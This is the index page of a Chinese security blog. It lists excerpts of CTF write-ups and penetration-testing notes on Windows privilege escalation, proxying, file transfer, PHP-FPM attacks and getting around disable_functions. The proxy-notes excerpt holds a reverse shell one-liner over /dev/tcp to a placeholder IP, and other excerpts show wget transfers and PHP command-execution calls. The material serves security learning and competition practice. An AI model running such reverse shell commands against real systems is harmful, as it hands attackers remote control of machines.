Dr0n's blog
  • 首页
  • 时间轴
  • 分类
  • 标签
  • 关于
  • 友链
  • awd
  • tools
    CyberChef emoji-aes

第七届浙江省大学生网络与信息安全竞赛预赛-WP

签到网安知识大挑战数据存储在js中 aes解密得到flag 签到题1Base92 -> Base85 -> Base64 -> Base62 -> Base58 -> Base45 -> Base32 DASCTF{welcome_to_zjctf_2024} webhack memory访问/robot.txt得到/upload路径
2024-11-02
wp
#wp #2024竞赛 #浙江

windows提权笔记

土豆家族原理可以与域渗透学习(NTLM篇)的内容结合起来看 一般使用 Potato 提权需要下列两个特权中的一个 SeImpersonatePrivilege SeAssignPrimaryTokenPrivilege 以下用户拥有SeImpersonatePrivilege权限,而 SeAssignPrimaryTokenPrivilege 只有更高权限的账户比如SYSTEM才有 12345
2024-10-11
总结
#总结 #提权

内网渗透学习(代理篇)

本文中使用的代理工具可通过我的脚本一键下载https://github.com/dr0n1/CTF_misc_auto_deploy 反弹shell推荐在本地部署一个reverse-shell-generator,可以很方便的查看命令 以下是几个常用的 bash -i1/bin/sh -i >& /dev/tcp/1.1.1.1/8888 0>&1 nc1234567
2024-10-10
总结
#总结 #内网渗透

内网渗透学习(文件传输篇)

wget & curl在vps或有python环境的主机启动 HTTP 文件服务器 1python3 -m http.server 8000 wget下载文件 1234567891011# 标准下载(保存为相同文件名)wget http://IP:8000/filename# 断点续传wget -c http://IP:8000/filename# 指定保存目录wget -P /path
2024-10-09
总结
#总结 #内网渗透 #域

2024年“羊城杯”粤港澳大湾区网络安全大赛 wp

[初赛] 数据安全data-analy1恢复被打乱的数据 1234567891011121314151617181920212223242526272829303132333435363738394041424344454647import csvimport reimport pandas as pddata = pd.read_csv("person_data.csv",
2024-08-28
wp
#wp #羊城杯 #2024竞赛

php-fpm攻击总结

PHP-FPM 是 FastCGI 的一个具体实现(协议解析器) Nginx等服务器中间件将用户请求按照fastcgi的规则打包好通过TCP传给FPM,然后FPM按照fastcgi的协议将TCP流解析成真正的数据 举个例子,用户访问http://127.0.0.1/index.php?a=1&b=2,如果web目录是/var/www/html,那么Nginx会
2024-07-22
总结
#总结 #php #中间件

绕过disable_functions的方法总结

常规函数函数绕过123456789101112131415161718<?php//exececho exec('whoami');//shell_exececho shell_exec('whoami');//systemsystem('whoami');//passthrupassthru("whoami")
2024-07-17
总结
#总结 #php #bypass #disable_functions #pwn

第十七届全国大学生信息安全竞赛-华东南分区赛

1签到+4web+4pwn web-welcome签到,Ctrl+U web-submitbreak文件上传,有对内容检测,使用短标签绕过 fix添加黑名单 1234567891011121314151617181920212223242526272829303132333435363738394041424344<?php// $path = "./uploads"
2024-06-25
wp
#wp #awdp #ciscn #2024竞赛

春秋云境 GreatWall(第一届长城杯半决赛渗透题)

ThinkPHP (172.28.23.17)先扫描端口,发现开放了两个web服务 8080是一个后台登录框,版本是ThinkPHP V5.0.23 直接用tp5的nday打 写入shell后根目录有flag1 然后上传fscan开始扫内网 1234567891011121: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue s
2024-06-10
内网渗透
#内网渗透 #春秋云境 #多维挑战

2024宁波市第七届网络安全大赛决赛 awd wp

pwn攻击 1234567891011121314151617181920212223242526272829303132333435363738394041424344454647484950515253545556575859606162636465from pwn import *context.arch='amd64'import sysdef add(ind,size
2024-05-25
wp
#wp #宁波 #awd
12345…12

搜索

Hexo Fluid
载入天数... 载入时分秒...
总访问量 次 总访客数 人
浙ICP备2022002247号 | police-icon 浙公网安备33021202003790号